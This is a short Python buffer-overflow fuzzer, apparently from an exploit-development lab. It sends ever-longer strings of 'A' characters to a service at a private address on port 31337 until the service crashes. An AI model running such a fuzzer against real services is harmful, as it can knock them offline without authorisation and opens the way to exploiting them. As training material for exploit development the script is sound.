#!/usr/bin/env python
import sys, time, socket

ip = "192.168.56.102"
port = 31337
timeout = 5
prefix = ""
counter = 100

string  = prefix + "A" * counter
while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((ip, port))
            print ('[+] Sending buffer')
            #s.recv(1024)
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string + '\r\n', "latin1"))
            s.recv(1024)
    except:
        print ("[!] The program can't be reached")
        sys.exit(0)
    string += counter * 'A'
    time.sleep(1)
